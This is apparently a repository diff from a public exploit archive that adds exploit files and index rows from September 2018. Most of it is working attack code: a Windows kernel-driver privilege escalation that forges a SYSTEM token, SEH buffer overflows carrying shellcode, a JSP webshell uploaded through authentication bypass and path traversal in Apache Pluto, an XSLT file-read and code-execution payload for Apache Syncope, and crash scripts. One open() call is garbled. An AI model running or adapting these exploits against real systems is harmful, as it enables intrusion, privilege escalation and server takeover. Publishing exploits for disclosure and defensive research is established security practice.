TOKEN_SOURCE SourceToken = { { '!', '!', '!', '!', '!', '!', '!', '!' }, { 0, 0 } };
SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY;
PSID lpSidOwner = NULL;
SID_INTEGRITY IntegritySIDSystem = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_SYSTEM_RID };
ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwCreateToken");
if (ZwCreateToken == NULL)
{
printf("[-] Unable to resolve ZwCreateToken: %d\n\n", GetLastError());
return NULL;
}
groups = (PTOKEN_GROUPS)GetInfoFromToken(hToken, TokenGroups);
primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(hToken, TokenPrimaryGroup);
default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(hToken, TokenDefaultDacl);
pSid = groups->Groups;
for (i=0; i<groups->GroupCount; i++, pSid++)
{
PISID piSid = (PISID)pSid->Sid;
if (pSid->Attributes & SE_GROUP_INTEGRITY)
{
memcpy(pSid->Sid, &IntegritySIDSystem, sizeof(IntegritySIDSystem));
}
if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_USERS)
{
memcpy(piSid, &TkSidLocalAdminGroup, sizeof(TkSidLocalAdminGroup)); // Found RID_USERS membership, overwrite with RID_ADMINS
pSid->Attributes = SE_GROUP_ENABLED;
}
else
{
pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
pSid->Attributes &= ~SE_GROUP_ENABLED;
}
}
pluidAuth = &authid;
li.LowPart = 0xFFFFFFFF;
li.HighPart = 0xFFFFFFFF;
pli = &li;
AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &lpSidOwner);
userToken.User.Sid = lpSidOwner;
userToken.User.Attributes = 0;
AllocateLocallyUniqueId(&luid);
SourceToken.SourceIdentifier.LowPart = luid.LowPart;
SourceToken.SourceIdentifier.HighPart = luid.HighPart;
ownerToken = (PTOKEN_OWNER) LocalAlloc(LPTR, sizeof(PSID));
ownerToken->Owner = GetLocalSystemSID();
privileges = SetPrivileges();
status = ZwCreateToken(&hTokenElevated,
TOKEN_ALL_ACCESS,
&oa,
TokenPrimary,
pluidAuth,
pli,
&userToken,
groups,
privileges,
ownerToken,
primary_group,
default_dacl,
&SourceToken);
if (status == STATUS_SUCCESS)
{
printf("\n[+] New token created successfully\n");
return hTokenElevated;
}
else
{
// printf("\n[-] Failed to create new token %08x\n", status);
return NULL;
}
if (lpSidOwner) FreeSid(lpSidOwner);
if (groups) LocalFree(groups);
if (privileges) LocalFree(privileges);
if (primary_group) LocalFree(primary_group);
if (default_dacl) LocalFree(default_dacl);
if (ownerToken) { if(ownerToken->Owner) FreeSid(ownerToken->Owner); LocalFree(ownerToken); }
return NULL;
}
int main(int argc, char *argv[])
{
QWORD TokenAddressTarget;
QWORD SepPrivilegesOffset = 0x40;
QWORD PresentByteOffset;
QWORD EnableByteOffset;
QWORD TokenAddress;
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
HANDLE hTokenCurrent;
HANDLE hTokenElevate;
printf("-------------------------------------------------------------------------------\n");
printf(" STOPzilla AntiMalware (szkg64.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on 64bit Windows 7 / Windows 10 (1803) \n");
printf("-------------------------------------------------------------------------------\n");
TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
printf("\n[i] Address of current process token 0x%p", TokenAddress);
TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget);
PresentByteOffset = TokenAddressTarget + 0x0;
printf("[i] Present bits at 0x%p will be overwritten\n", PresentByteOffset);
EnableByteOffset = TokenAddressTarget + 0x8;
printf("[i] Enabled bits at 0x%p will be overwritten", EnableByteOffset);
sprintf(devhandle, "\\\\.\\%s", "msprocess");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .\n");
getch();
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hTokenCurrent))
{
printf("[-] Failed OpenProcessToken() %d\n\n", GetLastError());
return NULL;
}
printf("[+] OpenProcessToken() handle opened successfully");
do
{
printf("\n[*] Overwriting _SEP_TOKEN_PRIVILEGES bits");
DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL);
DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);
hTokenElevate = CreateUserToken(hTokenCurrent);
Sleep(500);
} while (hTokenElevate == NULL);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows 7");
printf("\n[*] Spawning SYSTEM Shell");
spawnShell(hTokenElevate);
}
if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 10");
AddAccountToAdminGroup(hTokenElevate);
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not tested on this OS\n\n");
}
CloseHandle(hDevice);
return 0;
}

51
exploits/windows/local/45402.py Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title: Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-13
# Software Link: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
# Tested Version: 1.8.2
# Tested on OS: Windows 7 32bit
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name
# "exploit.txt" just copy the text inside "exploit.txt" and start the program
# and click on "System Setup" in the "Save Path for Snapshot and Record file" field.
# Paste the content of "exploit.txt" and click on Save. You will see a calculator poped up.
#!/usr/bin/python
buffer = "A" * 260
NSEH = "\xeb\x06\x90\x90"
SEH = "\x01\x19\x0c\x6a"
nops = "\x90" * 400
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (6384 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

51
exploits/windows/local/45406.py Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title: Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2018-09-13
# Vendor Homepage : http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Version Software : 8.07
# Tested on OS: Windows 7
# Related Exploit Link : https://www.exploit-db.com/exploits/45353/
'''
Steps to Reproduce:
===================
1.Download and install Photo to Video Converter Professional
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "" then go to Menu -> Help -> Save
4.Paste the contents of the file (poc.txt) into the input "Registration Name" and click "Activate"
5.Now the calculator executes!
'''
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 256
a = "\xeb\x06\xff\xff"
b = pack("<I",0x10015d71)
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20
c = "\x44" * 800
poc = buffer + a + b + nops + calc + c
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"

99
exploits/windows/webapps/45396.txt Normal file
View file

@ -0,0 +1,99 @@
# Exploit Title: Apache Portals Pluto 3.0.0 - Remote Code Execution
# Date: 2018-09-12
# Exploit Author: Che-Chun Kuo
# Vendor Homepage: https://portals.apache.org/pluto/
# Software Link: http://archive.apache.org/dist/portals/pluto/
# Version: 3.0.0
# Tested on: Windows
# Advisory: https://portals.apache.org/pluto/security.html
# Other Vulnerability Types: Authentication bypass, directory traversal, arbitrary file upload
# CVE: CVE-2018-1306
# Vulnerability 1: Authentication bypass via HTTP verb tampering
# Description: Apache Pluto uses web.xml security constraints to control access to resources.
# These security constraints have been insecurely defined allowing authentication to be bypassed.
# When specific http methods are listed within a security constraint, then only those
# methods are protected. Pluto defines the following http methods: GET, POST, and PUT.
# Since the HEAD method is not listed, a request with a HTTP HEAD method effectively
# circumvents the security policy.
# Vulnerability 2: Remote code execution via arbitrary file upload
# Description: An attacker can call the PortletV3AnnotatedDemo Multipart Portlet and upload
# an arbitrary file. The uploaded file is directly accessible within
# the /PortletV3AnnotatedDemo/temp/ directory. This technique allows an unauthenticated
# attacker to install a malicious JSP file and remotely execute code on a server running Apache Pluto.
# Insecure Remediation: This vulnerability was mitigated by moving the /temp directory
# outside the /webapps directory and under the Tomcat directory.
# Vulnerability 3: Directory traversal in multipart file upload
# Description: Apache Pluto's multipart file uploader is vulnerable to directory traversal.
# An attacker is able to upload a file outside the default /temp directory to an arbitrary location
# on the filesystem. The following filename will drop a JSP webshell
# into the /webapps/pluto public directory: filename="../../../webapps/pluto/jspshell.jsp".
# Leveraging this technique, remote code execution via webshell is still possible despite
# remediation in Vulnerability 2.
# PROOF OF CONCEPT
# UPLOAD REQUEST 1 - TEMP DIR INSIDE WEBROOT
HEAD /pluto/portal/File%20Upload/__pdPortletV3AnnotatedDemo.MultipartPortlet%21-1517407963%7C0;0/__ac0 HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=XX
Content-Length: 727
--XX
Content-Disposition: form-data; name="file"; filename="jspshell.jsp"
Content-Type: application/octet-stream
<FORM METHOD=GET ACTION='jspshell.jsp'>
CMD: <INPUT name='cmd' type=text value="cmd /c dir">
<INPUT type=submit value='Run'></FORM>
<%@ page import="java.io.*" %>
<%
String cmd = "whoami";
String param = request.getParameter("cmd");
if (param != null){ cmd = param; }
String s = null;
String output = "";
try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\r\n"; }
} catch(IOException e) { e.printStackTrace(); }
%>
<pre><%=output %></pre>
--XX--
# UPLOAD REQUEST 2 - TEMP DIR OUTSIDE WEBROOT
HEAD /pluto/portal/File%20Upload/__pdPortletV3AnnotatedDemo.MultipartPortlet%21-1517407963%7C0;0/__ac0 HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=XX
Content-Length: 748
--XX
Content-Disposition: form-data; name="file"; filename="../../../webapps/pluto/jspshell.jsp"
Content-Type: application/octet-stream
<FORM METHOD=GET ACTION='jspshell.jsp'>
CMD: <INPUT name='cmd' type=text value="cmd /c dir">
<INPUT type=submit value='Run'></FORM>
<%@ page import="java.io.*" %>
<%
String cmd = "whoami";
String param = request.getParameter("cmd");
if (param != null){ cmd = param; }
String s = null;
String output = "";
try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\r\n"; }
} catch(IOException e) { e.printStackTrace(); }
%>
<pre><%=output %></pre>
--XX--
# EXECUTE CMD
----------------------------------------
http://localhost:8080/pluto/jspshell.jsp?cmd=hostname

75
exploits/windows/webapps/45400.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: Apache Syncope 2.0.7 - Remote Code Execution
# Date: 2018-09-12
# Exploit Author: Che-Chun Kuo
# Vendor Homepage: https://syncope.apache.org/
# Software Link: http://archive.apache.org/dist/syncope/
# Version: 2.0.7
# Tested on: Windows
# Advisory: https://syncope.apache.org/security
# CVE: CVE-2018-1321, CVE-2018-1322
# Vulnerability 1: Remote code execution by users with report and template privileges
# Description: A user with access to the Reports and Templates functionality can use XSL Transformations (XSLT)
# to perform malicious operations, including but not limited to file read, file write, and code execution.
# Apache Syncope uses XSLT to export report data into various formats. An attacker can perform malicious
# operations by crafting a XSL template, binding the template to a report, executing, then exporting the report.
# The following XSL can be used to read the Syncope security.properties file or execute the Windows
# calc program, respectively.
READ security.properties file
-------------------------------------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xsl:stylesheet [<!ENTITY file SYSTEM "..\webapps\syncope\WEB-INF\classes\security.properties">]>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">&file;</xsl:template>
</xsl:stylesheet>
EXECUTE Windows calc program
-------------------------------------------
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:runtime="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:process="http://xml.apache.org/xalan/java/java.lang.Process">
<xsl:variable name="rtobject" select="runtime:getRuntime()"/>
<xsl:variable name="process" select="runtime:exec($rtobject,'calc')"/>
<xsl:variable name="waiting" select="process:waitFor($process)"/>
<xsl:value-of select="$process"/>
</xsl:stylesheet>
# Vulnerability 2: Information disclosure via FIQL and ORDER BY sorting
# Description: A user with entitlements to the /syncope/rest/users endpoint can recover sensitive
# security values using the fiql and orderby parameters.
# By default, Apache Syncope prevents sensitive values from being returned when querying
# the /syncope/rest/users endpoint. Fields such as securityAnswers or password will always return null.
# However the results returned can be filtered or sorted based on sensitive fields. By measuring how
# the results are returned the values of the desired fields can be successfully recovered. The fiql parameter
# can be used to recover full security answers, and the orderby parameter can be used to recover
# full security answers and partial information about password hashes.
# The fiql parameter allows filtering based on user attributes, including a user's security answer.
# By using FIQL filters (i.e. "securityAnswer==a*", "securityAnswer==b*", etc...) a user's
# securityAnswer can be recovered one letter at a time.
# The orderby parameter allows sorting based on user attributes, including a user's security
# answer and password. The following example shows how orderby sorting can be exploited.
# User Bob exists with the security answer "test". A malicious user creates a user Alice with the
# security answer "ta". The malicious actor then calls the /syncope/rest/users endpoint with orderby=securityAnswer".
# By sorting using the "securityAnswer" attribute, the result will have Alice sorted ahead of Bob,
# due to the value "ta" being before the value "test". By sequentially changing Alice's security
# question and comparing the sorted result, Bob's security answer can be recovered one letter
# at a time. A similar technique can be used to reveal partial information about user password hashes.
Orderby Example Results:
Alice's security answer, Order of results returned
ta, [Alice, Bob]
tb, [Alice, Bob]
tc, [Alice, Bob]
td, [Alice, Bob]
te, [Alice, Bob]
tf, [Bob, Alice]
tea, [Alice, Bob]
teb, [Alice, Bob]

28
exploits/windows_x86-64/dos/45404.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: TeamViewer App 13.0.100.0 - Denial of Service (PoC)
# Exploit Author: Ali Alipour
# WebSite: http://Alipour.it
# Date: 2018-09-13
# Vendor Homepage: https://www.teamviewer.com
# Software Link Download:https://www.microsoft.com/en-us/p/teamviewer-remote-control/9wzdncrfj0rh?activetab=pivot%3aoverviewtab
# Tested on: Windows 10 - 64-bit
# Steps to Reproduce
# Run the python exploit script, it will create a new
# file with the name "TeamViewer.txt" just copy the text inside "TeamViewer.txt"
# and start the TeamViewer App 13.0.100.0 - In Microsoft Windows 10 .
# In The New Window Click On " Login " And Paste "Test@Test.Com" into Email Address Filed .
# Now Paste The Content Of "TeamViewer.txt" Into The Field: " Password ".
# Click "Sign in" And You Will See a [ Boom !!!! ] - TeamViewer App 13.0.100.0 - In Microsoft Windows 10 Crash.
#!/usr/bin/python
buffer = "A" * 9000
payload = buffer
try:
f=open("TeamViewer.txt",22"w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

25
exploits/windows_x86-64/local/45395.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-11
# Vendor Homepage: http://www.indusoft.com/
# Software Link: http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
# Tested on OS: Windows 10 Pro x64 en
# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InduSoft_Web_Studio_8.1.py
# 2.- Open InduSoft_Web_Studio_8.1.txt and copy content to clipboard
# 3.- Open IWS v8.1 InduSoft Web Studio
# 4.- Home
# 5.- Paste ClipBoard on "Tag Name"
#!/usr/bin/env python
nSEH = "\x42\x42"
SEH = "\x43\x43"
buffer = "\x41" * 1042 + nSEH + SEH
f = open ("InduSoft_Web_Studio_8.1.txt", "w")
f.write(buffer)
f.close()

32
exploits/windows_x86/dos/45397.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
# Exploit Author: ZwX
# Exploit Date: 2018-09-11
# Vendor Homepage : http://www.clone2go.com/
# Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe
# Tested on OS: Windows 7
# Proof of Concept (PoC):
# The local buffer overflow vulnerability can be exploited by local attackers with
# restricted system user account without user interaction. For security demonstration
# or to reproduce follow the provided information and steps below to continue.
# Manual steps to reproduce the vulnerability ...
# 1 Install the software and start the client
# 2 Copy the AAAA...string from bof.txt to clipboard
# 3 Run VideoConverter.exex
# 4 Go Menu Menu > Edit > Options > Set Output folder (Input)
# 5 Paste it the input AAAA....string and click Open
# 6 A messagebox opens click ok
# 7 Software will stable crash or shut down
# 8 Successful reproduce of the Denial of Service
#!/usr/bin/python
buffer = "\x41" * 430
poc = buffer
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"

51
exploits/windows_x86/local/45403.py Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title: Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-13
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested on OS: Windows 7 32bit
# Tested Version: 2.6
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.mp3".
# Start the program and click on "Convert".
# Find the file "exploit.mp3" and click "Open"
# You will see a calculator poped up.
#!/usr/bin/python
buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x21\x21\xe4\x66"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf + pad
try:
f=open("exploit.mp3","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

14
files_exploits.csv
View file

@ -6105,6 +6105,10 @@ id,file,description,date,author,type,platform,port
45389,exploits/windows/dos/45389.py,"PDF Explorer 1.5.66.2 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
45390,exploits/windows/dos/45390.py,"Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
45391,exploits/macos/dos/45391.py,"Apple macOS 10.13.4 - Denial of Service (PoC)",2018-09-12,Sriram,dos,macos,
45397,exploits/windows_x86/dos/45397.py,"Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)",2018-09-13,ZwX,dos,windows_x86,
45398,exploits/windows/dos/45398.py,"MediaTek Wirless Utility rt2870 - Denial of Service (PoC)",2018-09-13,"Lawrence Amer",dos,windows,
45404,exploits/windows_x86-64/dos/45404.py,"TeamViewer App 13.0.100.0 - Denial of Service (PoC)",2018-09-13,"Ali Alipour",dos,windows_x86-64,
45405,exploits/linux/dos/45405.txt,"Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler",2018-09-13,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9959,6 +9963,12 @@ id,file,description,date,author,type,platform,port
45372,exploits/linux/local/45372.txt,"VirtualBox 5.2.6.r120293 - VM Escape",2018-08-28,"Reno Robert",local,linux,
45378,exploits/windows_x86-64/local/45378.py,"InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)",2018-09-11,"Luis Martínez",local,windows_x86-64,
45379,exploits/android/local/45379.txt,"Android - 'zygote->init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android,
45395,exploits/windows_x86-64/local/45395.py,"InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)",2018-09-13,"Luis Martínez",local,windows_x86-64,
45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation",2018-09-13,"Parvez Anwar",local,windows,
45402,exploits/windows/local/45402.py,"Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows,
45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86,
45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39961,5 +39971,7 @@ id,file,description,date,author,type,platform,port
45386,exploits/windows/webapps/45386.txt,"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)",2018-09-12,bzyo,webapps,windows,
45387,exploits/windows/webapps/45387.txt,"SynaMan 4.0 build 1488 - SMTP Credential Disclosure",2018-09-12,bzyo,webapps,windows,
45392,exploits/php/webapps/45392.txt,"IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection",2018-09-12,"Mohamed Sayed",webapps,php,
45393,exploits/php/webapps/45393.txt,"MyBB 1.8.17 - Cross-Site Scripting",2018-09-12,0xB9,webapps,php,
45393,exploits/php/webapps/45393.txt,"MyBB 1.8.17 - Cross-Site Scripting",2018-09-12,0xB9,webapps,php,80
45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,
45396,exploits/windows/webapps/45396.txt,"Apache Portals Pluto 3.0.0 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,

Can't render this file because it is too large.